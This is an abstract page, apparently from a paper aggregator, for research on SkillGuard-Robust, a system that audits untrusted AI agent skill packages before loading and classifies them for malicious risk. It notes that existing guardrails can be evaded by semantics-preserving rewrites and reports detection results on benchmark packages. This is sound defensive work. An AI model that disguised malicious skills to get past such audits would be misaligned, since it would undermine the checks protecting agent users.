Structured Security Auditing and Robustness Enhancement for Untrusted Agent Skills

📄 Abstract - Structured Security Auditing and Robustness Enhancement for Untrusted Agent Skills

Agent Skills package this http URL files, scripts, reference documents, and repository context into reusable capability units, turning pre-load auditing from single-prompt filtering into cross-file security review. Existing guardrails often flag risk but recover malicious intent inconsistently under semantics-preserving rewrites. This paper formulates pre-load auditing for untrusted Agent Skills as a robust three-way classification task and introduces SkillGuard-Robust, which combines role-aware evidence extraction, selective semantic verification, and consistency-preserving adjudication. We evaluate SkillGuard-Robust on SkillGuardBench and two public-ecosystem extensions through five large evaluation views ranging from 254 to 404 packages. On the 404-package held-out aggregate, SkillGuard-Robust reaches 97.30% overall exact match, 98.33% malicious-risk recall, and 98.89% attack exact consistency. On the 254-package external-ecosystem view, it reaches 99.66%, 100.00%, and 100.00%, respectively. These results support a bounded conclusion: factorized package auditing materially improves frozen and public-ecosystem robustness, while harsher external-source transfer remains an open challenge.

面向不可信智能体技能的结构化安全审计与鲁棒性增强 / Structured Security Auditing and Robustness Enhancement for Untrusted Agent Skills

1️⃣ 一句话总结

本文提出了一种名为SkillGuard-Robust的系统，通过在加载前对智能体技能包进行跨文件的角色感知证据提取、语义验证和一致性裁决，将安全审计从简单的单次提示过滤升级为鲁棒的三分类任务，实验表明该方法能有效抵御恶意改写攻击，并在多数据集中达到97%以上的安全检测准确率。

← 返回列表

菜单

AI 帮我研读全文

1️⃣ 一句话总结

密码管理

设置密码

修改密码

移除密码

菜单

AI 帮我研读全文

1️⃣ 一句话总结

获取最新论文摘要